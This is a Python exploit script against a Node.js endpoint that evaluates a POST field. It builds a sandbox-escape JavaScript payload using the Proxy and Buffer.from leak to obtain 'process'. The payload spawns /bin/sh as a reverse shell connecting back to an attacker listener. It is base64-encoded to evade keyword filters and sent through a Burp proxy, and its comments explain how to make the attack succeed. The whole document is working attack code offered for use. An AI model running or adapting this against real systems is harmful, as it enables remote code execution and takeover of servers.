#!/usr/bin/python3
import base64
import json

import requests
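# --- Target / callback configuration --------------------------------------
# Vulnerable Node.js endpoint; the `transformation` POST field is evaluated
# server-side (see main()).
target = "http://127.0.0.1:3000/"
# Command the target spawns and wires to the callback socket.
cmd = "/bin/sh"
# Listener the reverse shell connects back to. Start it BEFORE running this
# script (e.g. `nc -lvnp 4444`); the exec'd shell exits silently if nobody
# is listening, and the HTTP response will not tell you that happened.
attackerIp = "127.0.0.1"
attackerPort = 4444
# Route the request through Burp for inspection; set to None to go direct.
# NOTE: with a proxy configured, a ConnectionError means Burp is not
# listening on 8080, not that the target is down.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# Seconds to wait for the HTTP response. The payload does not need the
# response to succeed, so without a timeout a slow/filtered target just
# hangs this script with no diagnostic.
timeout = 10


def build_payload(command: str, attacker_ip: str, attacker_port: int) -> str:
    """Return the JavaScript reverse-shell payload that runs on the target.

    The script is the published Proxy + Buffer.from host-object leak pattern
    for Node.js sandboxes: Buffer.from() invokes the Proxy's
    getOwnPropertyDescriptor trap, the trap throws an arrow function, and the
    catch block calls that function to obtain `process` via
    Function("return process"). `process.mainModule.require` then loads `net`
    and `child_process`, execs `command` and pipes its stdio over a TCP socket
    to `attacker_ip:attacker_port`. Whether the escape works depends on the
    target's sandbox implementation/version -- verify against the target.

    Args:
        command: shell command to spawn on the target (e.g. "/bin/sh").
        attacker_ip: host the target connects back to.
        attacker_port: TCP port of the listener; coerced to int so only a
            number ever lands in the JS source.

    Returns:
        JavaScript source as a str (not yet base64-encoded).
    """
    # json.dumps emits a correctly quoted and escaped JS string literal, so a
    # command or host containing quotes/backslashes cannot break out of the
    # literal and produce a syntax error on the target.
    # Double {{}} pairs are required to escape single {} in Python formatted strings.
    return """( function(){{
try{{
Buffer.from(new Proxy({{}}, {{
getOwnPropertyDescriptor(){{
throw f=>f.constructor("return process")();
}}
}}));
}}catch(e){{
let req = e(()=>{{}}).mainModule.require;
let net = req("net");
let sh = req("child_process").exec({0});
let client = new net.Socket();
client.connect({1}, {2}, function() {{
client.pipe(sh.stdin); sh.stdout.pipe(client);
sh.stderr.pipe(client);
}});
}}
}})();""".format(json.dumps(command), int(attacker_port), json.dumps(attacker_ip))


def encode_payload(js: str) -> str:
    """Base64-encode JavaScript source and return the ASCII text.

    Encoding keeps the payload opaque to form-encoding and to any naive
    keyword filtering between the HTTP layer and eval(); UTF-8 is used so a
    non-ASCII command does not raise here.
    """
    return base64.b64encode(js.encode("utf-8")).decode("ascii")


def build_wrapper(b64_payload: str) -> str:
    """Return the eval() stager that decodes and runs `b64_payload` on the target.

    The base64 alphabet (A-Z, a-z, 0-9, +, /, =) contains neither a backtick
    nor `${`, so embedding it in a JS template literal cannot terminate or
    interpolate the literal.
    """
    return """( function(){{
let b64Payload = `{0}`;
let buffer = Buffer.from(b64Payload, 'base64');
let shell = buffer.toString();
eval(shell);
}})();""".format(b64_payload)


def main() -> None:
    """POST the stager in the `transformation` field and report the HTTP result."""
    wrapper = build_wrapper(encode_payload(build_payload(cmd, attackerIp, attackerPort)))
    data = {"transformation": wrapper}
    res = requests.post(target, data=data, proxies=proxies, timeout=timeout)
    # HTTP 200 only shows the server accepted and evaluated the request; the
    # only proof the exploit worked is a connection arriving at the listener.
    if res.status_code == 200:
        print("[X] Great success. Can haz shellz?")
    else:
        print(f"[!] Unexpected HTTP status {res.status_code}; check the listener anyway.")


if __name__ == "__main__":
    main()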